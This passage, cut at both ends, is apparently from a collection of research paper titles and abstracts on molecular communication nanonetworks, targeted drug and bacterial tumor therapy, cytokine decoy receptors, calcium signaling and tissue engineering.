receiver sensitivity. --- paper_title: TCP-like molecular communications paper_content: In this paper, we present a communication protocol between a pair of biological nanomachines, i.e., a transmitter and a receiver, built upon molecular communications in an aqueous environment. In our proposal, the receiver, acting as a control node, sends a connection setup signal to the transmitter, which stokes molecules, to start molecule transmission. The molecules transmitted by the transmitter propagate in the environment and are absorbed by the receiver through its receptors. When the receiver absorbs the desired quantity of molecules, it releases a tear-down signal to notify the transmitter to stop the transmission. The proposed protocol implements a bidirectional communication by using a number of techniques originally designed for the TCP. In fact, the proposed protocol is connection-oriented and uses the TCP-like probing to find a suitable transmission rate between the transmitter and the receiver to avoid receiver congestion. Unlike the TCP, however, explicit acknowledgments are not used since they would degrade the communication throughput due to the large delay, which is a characteristic feature of molecular communications. Thus, the proposed protocol uses implicit acknowledgments, and feedback signals are sent by the receiver to throttle the transmission rate at the transmitter, i.e., explicit negative feedback. We also present the results of an extensive simulation campaign, used to validate the proposed protocol and to properly dimension the main protocol parameters. --- paper_title: Influence of Red Blood Cells on Nanoparticle Targeted Delivery in Microcirculation paper_content: Multifunctional nanomedicine holds considerable promise as the next generation of medicine that allows for targeted therapy with minimal toxicity. 
Most current studies on nanoparticle (NP) drug delivery consider a Newtonian fluid with suspending NPs. However, blood is a complex biological fluid composed of deformable cells, proteins, platelets, and plasma. For blood flow in capillaries, arterioles and venules, the particulate nature of the blood needs to be considered in the delivery process. The existence of the cell-free-layer and NP–cell interaction will largely influence both the dispersion and binding rates, thus impact targeted delivery efficacy. In this paper, a particle–cell hybrid model is developed to model NP transport, dispersion, and binding dynamics in blood suspension. The motion and deformation of red blood cells (RBCs) is captured through the Immersed Finite Element Method. The motion and adhesion of individual NPs are tracked through Brownian adhesion dynamics. A mapping algorithm and an interaction potential function are introduced to consider the cell–particle collision. NP dispersion and binding rates are derived from the developed model under various rheology conditions. The influence of red blood cells, vascular flow rate, and particle size on NP distribution and delivery efficacy is characterized. A non-uniform NP distribution profile with higher particle concentration near the vessel wall is observed. Such distribution leads to over 50% higher particle binding rate compared to the case without RBC considered. The tumbling motion of RBCs in the core region of the capillary is found to enhance NP dispersion, with dispersion rate increasing as shear rate increases. Results from this study contribute to the fundamental understanding and knowledge on how the particulate nature of blood influences NP delivery, which will provide mechanistic insights on the nanomedicine design for targeted drug delivery applications. --- paper_title: Advection, diffusion and delivery over a network paper_content: Many biological, geophysical, and technological systems involve the transport of a resource over a network. In this paper, we present an efficient method for calculating the exact quantity of the resource in each part of an arbitrary network, where the resource is lost or delivered out of the network at a given rate, while being subject to advection and diffusion. The key conceptual step is to partition the resource into material that does or does not reach a node over a given time step. As an example application, we consider resource allocation within fungal networks, and analyze the spatial distribution of the resource that emerges as such networks grow over time. Fungal growth involves the expansion of fluid filled vessels, and such growth necessarily involves the movement of fluid. We develop a model of delivery in growing fungal networks, and find good empirical agreement between our model and experimental data gathered using radio-labeled tracers. Our results lead us to suggest that in foraging fungi, growth-induced mass flow is sufficient to account for long-distance transport, if the system is well insulated. We conclude that active transport mechanisms may only be required at the very end of the transport pathway, near the growing tips. --- paper_title: Reliability and Delay Analysis of Multihop Virus-Based Nanonetworks paper_content: Molecular communication is a new communication paradigm that allows nanomachines to communicate using biological mechanisms and/or components to transfer information (e.g., molecular diffusion, molecular motors). 
One possible approach for molecular communication is through the use of virus particles that act as carriers for nucleic acid-based information. This paper analyzes multihop molecular nanonetworks that utilize virus particles as information carrier. The analysis examines the physiochemical and biological characteristics of virus particles such as diffusion, absorption, and decay, and how they affect the reliability of multihop communication in molecular nanonetworks. The paper also analyzes the use of a simple implicit acknowledgement protocol for a single-path topology, and compare its performance to defined and random multipath topologies that do not use acknowledgments. Numerical results show that commensurate reliability is achievable for single-path with implicit acknowledgement and multipath topologies. However, the single-path topology exhibits increased communication delay and more uncertain end-to-end communication time. --- paper_title: Stable Escherichia coli-Clostridium acetobutylicum shuttle vector for secretion of murine tumor necrosis factor alpha paper_content: Recombinant plasmids were constructed to secrete mouse tumor necrosis factor alpha (mTNF-α) from Clostridium acetobutylicum. The shuttle plasmids contained the clostridial endo-β1,4-glucanase (eglA) promoter and signal sequence that was fused in frame to the mTNF-α cDNA. The construction was first tested in Escherichia coli and then introduced in C. acetobutylicum DSM792 by electroporation. Controls confirmed the presence and stability of the recombinant plasmids in this organism. Sodium dodecyl sulfate-polyacrylamide gel electrophoresis and an in vitro cytotoxic assay were used to monitor expression and secretion of mTNF-α during growth. Significant levels of biologically active mTNF-α were measured in both lysates and supernatants. The present report deals with investigations on the elaboration of a gene transfer system for cancer treatment using anaerobic bacteria. --- paper_title: Bacterial targeted tumour therapy-dawn of a new era. paper_content: Original observation of patients' spontaneous recovery from advanced tumours after an infection or a "fever" inspired extensive research. As a result, Coley's toxin for the therapy of sarcomas and live Bacillus Calmette-Guerin (BCG) for bladder cancer were born. In addition, three genera of anaerobic bacteria have been shown to specifically and preferentially target solid tumours and cause significant tumour lyses. Initial research had focused on determining the best tumour colonizing bacteria, and assessing the therapeutic efficacy of different strategies either as a single or combination treatment modalities. However, although clinical trials were carried out as early as the 1960s, lack of complete tumour lyses with injection of Clostridial spores had limited their further use. Recent progress in the field has highlighted the rapid development of new tools for genetic manipulation of Clostridia which have otherwise been a hurdle for a long time, such as plasmid transformation using electroporation that bore the problems of inefficiency, instability and plasmid loss. A new Clostridium strain, C. novyi-NT made apathogenic by genetic modification, is under clinical trials. New genetic engineering tools, such as the group II intron has shown promise for genetic manipulation of bacteria and forecast the dawn of a new era for a tumour-targeted bacterial vector system for gene therapy of solid tumours. 
In this review we will discuss the potential of genetically manipulated bacteria that will usher in the new era of bacterial therapy for solid tumours, and highlight strategies and tools used to improve the bacterial oncolytic capability. --- paper_title: Forward and Reverse Coding for Chromosome Transfer in Bacterial Nanonetworks paper_content: Abstract Bacteria has been proposed in recent years as one approach to achieve molecular communication. Bacterial cells can harbour DNA encoded information and can deliver this information from one nanomachine to another by swimming (motility). One aspect of bacterial communication that could further enhance the performance of information delivery in bacterial nanonetworks is conjugation . Conjugation involves forming a physical connection between the bacteria in order to transfer DNA molecules (i.e., plasmids or chromosomes). However, the fragile physical connection between the bacteria is prone to breakage, in particular under mechanical stress. In this paper, a simple Forward and Reverse coding process is proposed to enhance the performance of information delivery in bacterial nanonetworks. The coding process involves segmenting messages into blocks and integrating this into the bacterial chromosome. Simulation work have been conducted to validate the efficiency of the coding process, where the results have shown positive performance compared to approaches that do not utilize coding or pure conjugation. --- paper_title: Oxygen status of malignant tumors: pathogenesis of hypoxia and significance for tumor therapy. paper_content: Hypoxic areas are a characteristic property of solid tumors. Hypoxia results from an imbalance between the supply and consumption of oxygen. Major pathogenetic mechanisms for the emergence of hypoxia are (1) structural and functional abnormalities in the tumor microvasculature; (2) an increase in diffusion distances; and (3) tumor- or therapy-associated anemia leading to a reduced O2 transport capacity of the blood. There is pronounced intertumor variability in the extent of hypoxia, which is independent of clinical size, stage, histopathologic type, and grade. Local recurrences have a higher hypoxic fraction than primary tumors. Tumor hypoxia is intensified in anemic patients, especially in tumors with low perfusion rates. Tumor hypoxia is a therapeutic problem, as it makes solid tumors resistant to sparsely ionizing radiation and some forms of chemotherapy. Hypoxia also may modulate the proliferation and cell cycle position of tumor cells and, in turn, the amount of cells destroyed following therapy. Recent clinical studies suggest that hypoxia can enhance malignant progression and increase aggressiveness through clonal selection and genome changes. As a result, loss of differentiation and apoptosis, chaotic angiogenesis, increased locoregional spread, and enhanced metastasis can further increase resistance to therapy and affect long-term prognosis. Hypoxia is a powerful, independent prognostic factor in cervix cancers, carcinomas of the head and neck, and in soft-tissue sarcomas. --- paper_title: Secretory production of biologically active rat interleukin-2 by Clostridium acetobutylicum DSM792 as a tool for anti-tumor treatment. paper_content: The search for effective means of selectively delivering high therapeutic doses of anti-cancer agents to tumors has explored a variety of systems in the last decade. 
The ability of intravenously injected clostridial spores to infiltrate and thence selectively germinate in the hypoxic regions of solid tumors is exquisitely specific, making this system an interesting addition to the anti-cancer therapy arsenal. To increase the number of therapeutic proteins potentially useful for cancer treatment we have tested the possibility of Clostridium acetobutylicum to secrete rat interleukin-2 (rIL2). Therefore, rIL2 cDNA was placed under the control of the endo-beta-1,4-glucanase promoter and signal sequence of C. saccharobutylicum. Recombinant C. acetobutylicum containing the relevant construct secreted up to 800 µg l(-1) of biologically active rIL2. The obtained yield should be sufficient to provoke in vivo effects. --- paper_title: Universal computing by DNA origami robots in a living animal paper_content: Nanoscale robots made from DNA origami can dynamically interact with each other and perform logic computations in a living animal. --- paper_title: Amplifying Genetic Logic Gates paper_content: Organisms must process information encoded via developmental and environmental signals to survive and reproduce. Researchers have also engineered synthetic genetic logic to realize simpler, independent control of biological processes. We developed a three-terminal device architecture, termed the transcriptor, that uses bacteriophage serine integrases to control the flow of RNA polymerase along DNA. Integrase-mediated inversion or deletion of DNA encoding transcription terminators or a promoter modulates transcription rates. We realized permanent amplifying AND, NAND, OR, XOR, NOR, and XNOR gates actuated across common control signal ranges and sequential logic supporting autonomous cell-cell communication of DNA encoding distinct logic-gate states. The single-layer digital logic architecture developed here enables engineering of amplifying logic gates to control transcription rates within and across diverse organisms.
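The transcriptor-style gates summarized in the Amplifying Genetic Logic Gates entry above can be pictured with a toy model: a stretch of DNA is a list of oriented elements, an integrase input inverts one element between its attachment sites, and transcription reaches the output gene only while a forward-oriented terminator still blocks the path. The sketch below is an illustration under those simplifying assumptions; the element names and the specific gate layout are hypothetical, not the constructs used in the cited work.

# Toy model of an integrase-controlled "transcriptor" AND gate.
# DNA is a list of (element, forward_orientation) pairs read left to right;
# transcription from the promoter reaches the gene only if every terminator
# in between has been flipped to the reverse orientation.

def flip(dna, element):
    """Integrase input: invert the orientation of one named element."""
    return [(name, not fwd) if name == element else (name, fwd)
            for name, fwd in dna]

def transcribed(dna):
    """True if RNA polymerase can travel from 'promoter' to 'gene'."""
    names = [name for name, _ in dna]
    start, end = names.index("promoter"), names.index("gene")
    return all(not fwd                      # forward terminators block flow
               for name, fwd in dna[start + 1:end]
               if name.startswith("terminator"))

# Two forward terminators between promoter and gene give AND behaviour:
# both integrase inputs must act before the output is expressed.
register = [("promoter", True),
            ("terminator_A", True),
            ("terminator_B", True),
            ("gene", True)]

for input_a in (False, True):
    for input_b in (False, True):
        state = register
        if input_a:
            state = flip(state, "terminator_A")
        if input_b:
            state = flip(state, "terminator_B")
        print(input_a, input_b, "->", transcribed(state))
# Only the (True, True) input combination yields transcription.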
--- paper_title: Antibody-Based Immunotherapy of Cancer paper_content: By targeting surface antigens expressed on tumor cells, monoclonal antibodies have demonstrated efficacy as cancer therapeutics. Recent successful antibody-based strategies have focused on enhancing antitumor immune responses by targeting immune cells, irrespective of tumor antigens. We discuss these innovative strategies and propose how they will impact the future of antibody-based cancer therapy. --- paper_title: Aptamers and Their Applications in Nanomedicine paper_content: Aptamers are composed of short RNA or single-stranded DNA sequences that, when folded into their unique 3D conformation, can bind to their targets with high specificity and affinity. Although functionally similar to protein antibodies, oligonucleotide aptamers offer several advantages over protein antibodies in biomedical and clinical applications. Through the enhanced permeability and retention effect, nanomedicines can improve the therapeutic index of a treatment and reduce side effects by enhancing accumulation at the disease site. However, this targets tumors passively and, thus, may not be ideal for targeted therapy. To construct ligand-directed "active targeting" nanobased delivery systems, aptamer-equipped nanomedicines have been tested for in vitro diagnosis, in vivo imaging, targeted cancer therapy, theranostic approaches, sub-cellular molecule detection, food safety, and environmental monitoring. This review focuses on the development of aptamer-conjugated nanomedicines and their application for in vivo imaging, targeted therapy, and theranostics. --- paper_title: Antibody therapy of cancer paper_content: The use of monoclonal antibodies (mAbs) for cancer therapy has achieved considerable success in recent years. Antibody-drug conjugates are powerful new treatment options for lymphomas and solid tumours, and immunomodulatory antibodies have also recently achieved remarkable clinical success. The development of therapeutic antibodies requires a deep understanding of cancer serology, protein-engineering techniques, mechanisms of action and resistance, and the interplay between the immune system and cancer cells. This Review outlines the fundamental strategies that are required to develop antibody therapies for cancer patients through iterative approaches to target and antibody selection, extending from preclinical studies to human trials. --- paper_title: Antibody-based molecular communication for targeted drug delivery systems paper_content: Antibody-based drug delivery systems (ADDS) are established as the most promising therapeutic methods for the treatment of human cancers and other diseases. ADDS are composed of small molecules (antibodies) that selectively bind to receptors (antigens) expressed by the diseased cells. In this paper, the Molecular Communication (MC) paradigm, where the delivery of molecules is abstracted as the delivery of information, is extended to be applied to the design and engineering of ADDS. The authors have previously developed a straightforward framework for the modeling of Particulate Drug Delivery Systems (PDDS) using nano-sized molecules. Here, the specificities of antibody molecules are taken into account to provide an analytical model of ADDS transport.
The inputs of the MC model of PDDS are the geometric properties of the antibodies and the topology of the blood vessels where they are propagated. Numerical results show that the analytical MC model is in good agreement with finite-element simulations, and that the anisotropy is an important factor influencing ADDS. --- paper_title: Semiconductor Quantum Dots for Photodynamic Therapy paper_content: The applicability of semiconductor QDs in photodynamic therapy (PDT) was evaluated by studying the interaction between CdSe QDs with a known silicon phthalocyanine PDT photosensitizer, Pc4. The study revealed that the QDs could be used to sensitize the PDT agent through a fluorescence resonance energy transfer (FRET) mechanism, or interact directly with molecular oxygen via a triplet energy-transfer process (TET). Both mechanisms result in the generation of reactive singlet oxygen species that can be used for PDT cancer therapy. --- paper_title: In vivo molecular and cellular imaging with quantum dots. paper_content: Quantum dots (QDs), tiny light-emitting particles on the nanometer scale, are emerging as a new class of fluorescent probe for in vivo biomolecular and cellular imaging. In comparison with organic dyes and fluorescent proteins, QDs have unique optical and electronic properties: size-tunable light emission, improved signal brightness, resistance against photobleaching, and simultaneous excitation of multiple fluorescence colors. Recent advances have led to the development of multifunctional nanoparticle probes that are very bright and stable under complex in vivo conditions. A new structural design involves encapsulating luminescent QDs with amphiphilic block copolymers and linking the polymer coating to tumor-targeting ligands and drug delivery functionalities. Polymer-encapsulated QDs are essentially nontoxic to cells and animals, but their long-term in vivo toxicity and degradation need more careful study. Bioconjugated QDs have raised new possibilities for ultrasensitive and multiplexed imaging of molecular targets in living cells, animal models and possibly in humans. --- paper_title: A soluble receptor for interleukin-1β encoded by vaccinia virus: A novel mechanism of virus modulation of the host response to infection paper_content: Vaccinia virus gene B15R is shown to encode an abundant, secretory glycoprotein that functions as a soluble interleukin-1 (IL-1) receptor. This IL-1 receptor has novel specificity since, in contrast with cellular counterparts, it binds only IL-1 beta and not IL-1 alpha or the natural competitor IL-1 receptor antagonist. The vaccinia IL-1 beta receptor is secreted when expressed in a baculovirus system and competitively inhibited binding of IL-1 beta to the natural receptor on T cells. Deletion of B15R from vaccinia virus accelerated the appearance of symptoms of illness and mortality in intranasally infected mice, suggesting that the blockade of IL-1 beta by vaccinia virus can diminish the systemic acute phase response to infection and modulate the severity of the disease. The IL-1 beta binding activity is present in other orthopoxviruses. --- paper_title: Regulatory pathways in inflammation. paper_content: Tuning is a key aspect of inflammatory reaction essential in homeostasis and pathology. An emerging mechanism for negative regulation of proinflammatory cytokines is based on non-signaling IL-1/TLR receptors and chemokine receptors competing with signaling receptors for ligand binding and sustaining ligand internalization and degradation. 
Biological activities of IL-1R/TLR receptors are under control of membrane-bound binding molecules lacking the signaling domain, soluble receptor antagonists, and intracellular signaling inhibitors. The chemokine system includes at least three 'silent' receptors with distinct specificity and tissue distribution. D6 is the best characterized representative member of this class of negative regulators, binds most inflammatory, but not homeostatic, CC chemokines and shuttles in a ligand-independent way from the plasma membrane to endocytic compartments where chemokines are targeted to degradation. In vitro and in vivo evidence, including results with gene targeted mice, is consistent with the view that these non-signaling receptors for proinflammatory cytokines possess unique functional and structural features which make them ideally adapted to act as a decoy and scavenger receptors, with a non redundant role in dampening tissue inflammation and tuning draining lymph nodes reactivity. --- paper_title: Genetic control of mammalian T-cell proliferation with synthetic RNA regulatory systems paper_content: RNA molecules perform diverse regulatory functions in natural biological systems, and numerous synthetic RNA-based control devices that integrate sensing and gene-regulatory functions have been demonstrated, predominantly in bacteria and yeast. Despite potential advantages of RNA-based genetic control strategies in clinical applications, there has been limited success in extending engineered RNA devices to mammalian gene-expression control and no example of their application to functional response regulation in mammalian systems. Here we describe a synthetic RNA-based regulatory system and its application in advancing cellular therapies by linking rationally designed, drug-responsive, ribozyme-based regulatory devices to growth cytokine targets to control mouse and primary human T-cell proliferation. We further demonstrate the ability of our synthetic controllers to effectively modulate T-cell growth rate in response to drug input in vivo. Our RNA-based regulatory system exhibits unique properties critical for translation to therapeutic applications, including adaptability to diverse ligand inputs and regulatory targets, tunable regulatory stringency, and rapid response to input availability. By providing tight gene-expression control with customizable ligand inputs, RNA-based regulatory systems can greatly improve cellular therapies and advance broad applications in health and medicine. --- paper_title: Decoy receptors: a strategy to regulate inflammatory cytokines and chemokines. paper_content: The canonical concept of a receptor includes specific ligand recognition, usually with high affinity and specificity, and signaling. Decoy receptors recognize certain inflammatory cytokines with high affinity and specificity, but are structurally incapable of signaling or presenting the agonist to signaling receptor complexes. They act as a molecular trap for the agonist and for signaling receptor components. The interleukin-1 type II receptor (IL-1RII) was the first pure decoy to be identified. Decoy receptors have subsequently been identified for members of the tumor necrosis factor receptor and IL-1R families. Moreover, silent nonsignaling receptors could act as decoys for chemokines. Therefore, the use of decoy receptors is a general strategy to regulate the action of primary pro-inflammatory cytokines and chemokines. 
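A back-of-the-envelope reading of the "molecular trap" mechanism in the decoy-receptor entries above (generic symbols; an illustrative relation rather than a model taken from the cited reviews): if a ligand with total concentration L_tot can bind either a signaling receptor (total R_tot, dissociation constant K_R) or a non-signaling decoy (total D_tot, dissociation constant K_D), the free ligand L at equilibrium satisfies the mass balance

L_{\mathrm{tot}} = L + \frac{R_{\mathrm{tot}} L}{K_R + L} + \frac{D_{\mathrm{tot}} L}{K_D + L}, \qquad \theta_{\mathrm{signal}} = \frac{L}{K_R + L},

so an abundant, high-affinity decoy (large D_tot, small K_D) depresses L and with it the occupancy θ_signal of the signaling receptor.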
--- paper_title: Inhibition of vascular endothelial cell growth factor activity by an endogenously encoded soluble receptor paper_content: Vascular endothelial cell growth factor, a mitogen selective for vascular endothelial cells in vitro that promotes angiogenesis in vivo, functions through distinct membrane-spanning tyrosine kinase receptors. The cDNA encoding a soluble truncated form of one such receptor, fms-like tyrosine kinase receptor, has been cloned from a human vascular endothelial cell library. The mRNA coding region distinctive to this cDNA has been confirmed to be present in vascular endothelial cells. Soluble fms-like tyrosine kinase receptor mRNA, generated by alternative splicing of the same pre-mRNA used to produce the full-length membrane-spanning receptor, encodes the six N-terminal immunoglobulin-like extracellular ligand-binding domains but does not encode the last such domain, transmembrane-spanning region, and intracellular tyrosine kinase domains. The recombinant soluble human receptor binds vascular endothelial cell growth factor with high affinity and inhibits its mitogenic activity for vascular endothelial cells; thus this soluble receptor could act as an efficient specific antagonist of vascular endothelial cell growth factor in vivo. --- paper_title: A simulation tool for nanoscale biological networks paper_content: Nanonetworking is a new interdisciplinary research area including nanotechnology, biotechnology, and ICT. In this paper, we present a novel simulation platform designed for modeling information exchange at nanoscales. This platform is adaptable to any kind of nano bearer, i.e. any mechanism used to transport information, such as electromagnetic waves or calcium ions. Moreover, it includes a set of configuration functions in order to adapt to different types of biological environments. In this paper, we provide a thorough description of the simulation libraries. In addition, we demonstrate their capabilities by modeling a section of a lymph node and the information transfer within it, which happens between antibody molecules produced by the immune system during the humoral immune response. --- paper_title: Using Information Metrics and Molecular Communication to Detect Cellular Tissue Deformation paper_content: Calcium-signaling-based molecular communication has been proposed as one form of communication for short range transmission between nanomachines. This form of communication is naturally found within cellular tissues, where Ca(2+) ions propagate and diffuse between cells. However, the naturally flexible structure of cells usually leads to the cells dynamically changing shape under strain. Since the interconnected cells form the tissue, a change in shape of one cell will change the shape of the neighboring cells and the tissue as a whole. This will in turn dramatically impair the communication channel between the nanomachines. We propose a process for nanomachines utilizing Ca(2+) based molecular communication to infer and detect the state of the tissue, which we term the Molecular Nanonetwork Inference Process. The process employs a threshold based classifier that identifies its threshold boundaries based on a training process. The inference/detection mechanism allows the destination nanomachine to determine: i) the type of tissue deformation; ii) the amount of tissue deformation; iii) the amount of Ca(2+) concentration emitted from the source nanomachine; and iv) its distance from the destination nanomachines.
We evaluate the use of three information metrics: mutual information, mutual information with generalized entropy and information distance. Our analysis, which is conducted on two different topologies, finds that mutual information with generalized entropy provides the most accurate inferencing/detection process, enabling the classifier to obtain 80% of accuracy on average. --- paper_title: Molecular signaling in bioengineered tissue microenvironments. paper_content: Biological tissues and organs consist of specialized living cells arrayed within a complex structural and functional framework known generally as the extracellular matrix (ECM). The great diversity observed in the morphology and composition of the ECM contributes enormously to the properties and function of each organ and tissue. For example, the ECM contributes to the rigidity and tensile strength of bone, the resilience of cartilage, the flexibility and hydrostatic strength of blood vessels, and the elasticity of skin. The ECM is also important during growth, development, and wound repair: its own dynamic composition acts as a reservoir for soluble signaling molecules and mediates signals from other sources to migrating, proliferating, and differentiating cells. Artificial three-dimensional substitutes for ECM, called tissue scaffolds, may consist of natural or synthetic polymers or a combination of both. Scaffolds have been used successfully alone and in combination with cells and soluble factors to induce tissue formation or promote tissue repair. Appropriate numbers of properly functioning living cells are central to many tissue-engineering strategies, and significant efforts have been made to identify and propagate pluripotent stem cells and lineage-restricted progenitor cells. The study of these and other living cells in artificial microenvironments, in turn, has led to the identification of signaling events important for their controlled proliferation, proper differentiation, and optimal function. --- paper_title: Calcium Wave Propagation in Networks of Endothelial Cells: Model-based Theoretical and Experimental Study paper_content: In this paper, we present a combined theoretical and experimental study of the propagation of calcium signals in multicellular structures composed of human endothelial cells. We consider multicellular structures composed of a single chain of cells as well as a chain of cells with a side branch, namely a ‘‘T’’ structure. In the experiments, we investigate the result of applying mechano-stimulation to induce signaling in the form of calcium waves along the chain and the effect of single and dual stimulation of the multicellular structure. The experimental results provide evidence of an effect of architecture on the propagation of calcium waves. Simulations based on a model of calcium-induced calcium release and cell-to-cell diffusion through gap junctions shows that the propagation of calcium waves is dependent upon the competition between intracellular calcium regulation and architecture-dependent intercellular diffusion. --- paper_title: Mechanical stimulation initiates cell-to-cell calcium signaling in ovine lens epithelial cells. paper_content: Although abnormalities in calcium regulation have been implicated in the development of most forms of cataract, the mechanisms by which Ca2+ is regulated in the cells of the ocular lens remain poorly defined. 
Cell-to-cell Ca2+ signaling was investigated in primary cultures of ovine epithelial cells using the Ca(2+)-reporter dye fura-2 and fluorescence microscopy. Mechanical stimulation of a single cell with a micropipette initiated a propagated increase in cytosolic free Ca2+ that spread from the stimulated cell through 2-8 tiers of surrounding cells. During this intercellular Ca2+ wave, cytosolic Ca2+ increased 2- to 12-fold from resting levels of approximately 100 nM. Nanomolar extracellular Ca2+ did not affect the cell-to-cell propagation of the Ca2+ wave, but reduced the magnitude of the cytosolic Ca2+ increases, which was most evident in the mechanically-stimulated cell. Depletion of intracellular Ca2+ stores with thapsigargin eliminated the propagated intercellular Ca2+ wave, but did not prevent the cytosolic Ca2+ increase in the mechanically-stimulated cell, which required extracellular Ca2+ and was attenuated by the addition of the Ca2+ channel blockers Ni2+, Gd3+ and La3+ to the medium. These results are most easily explained by a mechanically-activated channel in the plasma membrane of the stimulated cell. The propagated increase in cytosolic Ca2+ appeared to be communicated to adjacent cells by the passage of an intracellular messenger other than Ca2+ through gap junction channels. However, if the plasma membrane of the mechanically-stimulated cell was ruptured such that there was loss of cytosolic contents, the increase in cytosolic Ca2+ in the surrounding cells was elicited by both a messenger passing through gap junction channels and by a cytosolic factor(s) diffusing through the extracellular medium. These results demonstrate the existence of intercellular Ca2+ signaling in lens cells, which may play a role in regulating cytosolic Ca2+ in the intact lens. --- paper_title: Molecular communication for nanomachines using intercellular calcium signaling paper_content: Molecular communication is engineered biological communication (e.g., cell-to-cell signaling) that allows nanomachines (e.g., engineered organisms, artificial devices) to communicate through chemical signals in an aqueous environment. This paper describes the design of a molecular communication system based on intercellular calcium signaling networks. This paper also describes possible functionalities (e.g., signal switching and aggregation) that may be achieved in such networks. --- paper_title: DIRECT: A model for molecular communication nanonetworks based on discrete entities paper_content: A number of techniques have been recently proposed to implement molecular communication, a novel method which aims to implement communication networks at the nanoscale, known as nanonetworks. A common characteristic of these techniques is that their main resource consists of molecules, which are inherently discrete. This paper presents DIRECT, a novel networking model which differs from conventional models by the way of treating resources as discrete entities; therefore, it is particularly aimed to the analysis of molecular communication techniques. Resources can be involved in different tasks in a network, such as message encoding, they do not attenuate in physical terms and they are considered 100% reusable. The essential properties of DIRECT are explored and the key parameters are investigated throughout this paper. 
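The intercellular calcium-signaling entries above describe waves that regenerate from cell to cell through gap-junction diffusion and threshold-triggered release. The sketch below is a minimal one-dimensional caricature of that competition between intercellular diffusion and intracellular regulation; the parameter values are illustrative assumptions, not fits to the cited experiments or models.

# Minimal 1-D model of an intercellular Ca2+ wave: gap-junction diffusion
# between neighbouring cells plus a one-shot, threshold-triggered release
# (calcium-induced calcium release), with first-order removal.
N_CELLS, STEPS, DT = 20, 400, 0.05
D_GJ, THRESHOLD, BOLUS, REMOVAL = 0.5, 0.15, 1.0, 0.8   # illustrative values

ca = [0.0] * N_CELLS
fired = [False] * N_CELLS
ca[0], fired[0] = 1.0, True          # mechanically stimulated cell

for _ in range(STEPS):
    new = ca[:]
    for i in range(N_CELLS):
        # diffusion to/from neighbours through gap junctions
        flux = sum(D_GJ * (ca[j] - ca[i])
                   for j in (i - 1, i + 1) if 0 <= j < N_CELLS)
        new[i] += DT * (flux - REMOVAL * ca[i])
        if not fired[i] and ca[i] > THRESHOLD:
            fired[i] = True
            new[i] += BOLUS          # regenerative release (CICR)
    ca = new

# With these illustrative parameters the wave regenerates along the chain.
print("cells reached by the Ca2+ wave:", sum(fired))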
--- paper_title: Therapeutic stem and progenitor cell transplantation for organ vascularization and regeneration paper_content: Emerging evidence suggests that bone marrow‐derived endothelial, hematopoietic stem and progenitor cells contribute to tissue vascularization during both embryonic and postnatal physiological processes. Recent preclinical and pioneering clinical studies have shown that introduction of bone marrow‐derived endothelial and hematopoietic progenitors can restore tissue vascularization after ischemic events in limbs, retina and myocardium. Corecruitment of angiocompetent hematopoietic cells delivering specific angiogenic factors facilitates incorporation of endothelial progenitor cells (EPCs) into newly sprouting blood vessels. Identification of cellular mediators and tissue-specific chemokines, which facilitate selective recruitment of bone marrow‐derived stem and progenitor cells to specific organs, will open up new avenues of research to accelerate organ vascularization and regeneration. In addition, identification of factors that promote differentiation of the progenitor cells will permit functional incorporation into neo-vessels of specific tissues while diminishing potential toxicity to other organs. In this review, we discuss the clinical potential of vascular progenitor and stem cells to restore long-lasting organ vascularization and function. --- paper_title: Protein-based signaling systems in tissue engineering. paper_content: Tissue engineering aims to replace damaged tissues or organs using either transplanted cells or host cells recruited to the target site. Protein signaling is crucial to regulate cell phenotype and thus engineered tissue structure and function. Biomaterial vehicles are being designed to incorporate and locally deliver various molecules involved in this signaling, including both growth factors and peptides that mimick whole proteins. Controlling the concentration, local duration and spatial distribution of these factors is key to their utility and efficacy. Recent advances have been made in the development of polymeric delivery systems intended to achieve this control. --- paper_title: A synthetic multicellular system for programmed pattern formation paper_content: Pattern formation is a hallmark of coordinated cell behaviour in both single and multicellular organisms. It typically involves cell–cell communication and intracellular signal processing. Here we show a synthetic multicellular system in which genetically engineered ‘receiver’ cells are programmed to form ring-like patterns of differentiation based on chemical gradients of an acyl-homoserine lactone (AHL) signal that is synthesized by ‘sender’ cells. In receiver cells, ‘band-detect’ gene networks respond to user-defined ranges of AHL concentrations. By fusing different fluorescent proteins as outputs of network variants, an initially undifferentiated ‘lawn’ of receivers is engineered to form a bullseye pattern around a sender colony. Other patterns, such as ellipses and clovers, are achieved by placing senders in different configurations. Experimental and theoretical analyses reveal which kinetic parameters most significantly affect ring development over time. Construction and study of such synthetic multicellular systems can improve our quantitative understanding of naturally occurring developmental processes and may foster applications in tissue engineering, biomaterial fabrication and biosensing. 
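The band-detect behaviour summarized in the synthetic multicellular pattern-formation entry above can be caricatured in a few lines: receiver cells respond only when the local AHL concentration falls between a low and a high threshold, so a gradient decaying away from a sender colony produces a ring. The gradient shape and the threshold values below are illustrative assumptions, not the published gene-network model.

import math

# Caricature of band-detect patterning: a sender at the origin sets up a
# radially decaying AHL gradient; receivers fluoresce only when the local
# concentration lies inside the band [LOW, HIGH], yielding a ring.
C0, DECAY_LENGTH = 100.0, 2.0        # arbitrary units; illustrative only
LOW, HIGH = 5.0, 20.0                # assumed band-detect thresholds

def ahl(distance_mm):
    # Exponentially decaying gradient, standing in for the full
    # reaction-diffusion profile around the sender colony (assumption).
    return C0 * math.exp(-distance_mm / DECAY_LENGTH)

ring = [round(x * 0.1, 1) for x in range(120) if LOW <= ahl(x * 0.1) <= HIGH]
print(f"fluorescent ring between {ring[0]} and {ring[-1]} mm from the sender")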
--- paper_title: Controlled differentiation of human bone marrow stromal cells using magnetic nanoparticle technology. paper_content: Targeting and differentiating stem cells at sites of injury and repair is an exciting and promising area for disease treatment and reparative medicine. We have investigated remote magnetic field activation of magnetic nanoparticle-tagged mechanosensitive receptors on the cell membrane of human bone marrow stromal cells (HBMSCs) for use in osteoprogenitor cell delivery systems and activation of differentiation in vitro and in vivo toward an osteochondral lineage. HBMSC-labeled with magnetic beads coated with antibodies or peptides to the transmembrane ion channel stretch activated potassium channel (TREK-1) or arginine–glycine–aspartic acid were cultured in monolayer or encapsulated into polysaccharide alginate/chitosan microcapsules. Upregulation in gene expression was measured in magnetic particle-labeled HBMSCs in response to TREK-1 activation over a short period (7 days) with an increase in mRNA levels of Sox9, core binding factor alpha1 (Cbfa1), and osteopontin. Magnetic particle-labeled HBMSCs encaps... --- paper_title: Perivascular and intravenous administration of basic fibroblast growth factor: vascular and solid organ deposition. paper_content: The in vivo mitogenicity of basic fibroblast growth factor (bFGF) for arterial smooth muscle cells relies on the removal of endothelium, raising the question of whether the endothelium serves as a mechanical barrier preventing contact of circulating bFGF with underlying smooth muscle cells or 